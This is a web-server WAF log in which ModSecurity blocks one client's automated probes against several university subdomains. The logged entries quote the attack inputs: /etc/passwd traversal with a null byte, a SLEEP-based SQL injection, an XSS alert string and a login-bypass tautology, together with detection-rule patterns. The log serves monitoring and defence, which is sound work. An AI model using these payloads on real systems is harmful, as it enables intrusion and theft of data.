[Tue Aug 29 11:43:52.379253 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:inputFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:inputFile: ../../../../../index.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/resin-doc/resource/tutorial/jndi-appconfig/test"] [unique_id "ZO13iMCo-f0AAAe8l5UAAAAF"]
[Tue Aug 29 11:43:55.343730 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfWNzcAAAAL"]
[Tue Aug 29 11:43:55.385709 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAe8l50AAAAF"]
[Tue Aug 29 11:43:55.407188 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAe8l54AAAAF"]
[Tue Aug 29 11:43:55.428795 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAe8l58AAAAF"]
[Tue Aug 29 11:43:55.467757 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAeX1KAAAAAK"]
[Tue Aug 29 11:43:55.644962 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAcsLOUAAAAE"]
[Tue Aug 29 11:43:55.687753 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAARphBIAAAAU"]
[Tue Aug 29 11:43:55.709546 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAe8l6oAAAAF"]
[Tue Aug 29 11:43:55.713314 2023] [:error] [pid 2019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfjGNcAAAAh"]
[Tue Aug 29 11:43:55.722603 2023] [:error] [pid 2022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfm6NAAAAAk"]
[Tue Aug 29 11:43:55.763169 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13i8Co-f0AAAfEBvsAAAAO"]
[Tue Aug 29 11:43:56.357753 2023] [:error] [pid 2022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jMCo-f0AAAfm6NIAAAAk"]
[Tue Aug 29 11:43:56.368358 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAeChhUAAAAw"]
[Tue Aug 29 11:43:56.369478 2023] [:error] [pid 2019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfjGNoAAAAh"]
[Tue Aug 29 11:43:56.378609 2023] [:error] [pid 2015] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfforEAAAAd"]
[Tue Aug 29 11:43:56.381118 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jMCo-f0AAAfky7oAAAAi"]
[Tue Aug 29 11:43:57.374526 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAe8l7AAAAAF"]
[Tue Aug 29 11:43:57.378316 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfcoMUAAAAa"]
[Tue Aug 29 11:43:57.379303 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfEBwAAAAAO"]
[Tue Aug 29 11:43:57.395992 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfiYjsAAAAg"]
[Tue Aug 29 11:43:57.398892 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jcCo-f0AAAfcoMYAAAAa"]
[Tue Aug 29 11:43:57.416056 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jcCo-f0AAAfiYjwAAAAg"]
[Tue Aug 29 11:43:58.379398 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAfg7vsAAAAe"]
[Tue Aug 29 11:43:58.382306 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAfiYj8AAAAg"]
[Tue Aug 29 11:43:58.388230 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAdOeXwAAAAS"]
[Tue Aug 29 11:43:58.392843 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAdQ3oMAAAAV"]
[Tue Aug 29 11:43:58.395075 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13jsCo-f0AAAc4EuQAAAAP"]
[Tue Aug 29 11:43:58.401733 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: files/admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/editor_tools/module"] [unique_id "ZO13jsCo-f0AAAfFKBgAAAAR"]
[Tue Aug 29 11:43:58.404900 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ID: 0 AND (SELECT 1 FROM (SELECT(SLEEP(7)))test)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO13jsCo-f0AAAfiYkAAAAAg"]
[Tue Aug 29 11:43:59.367589 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag 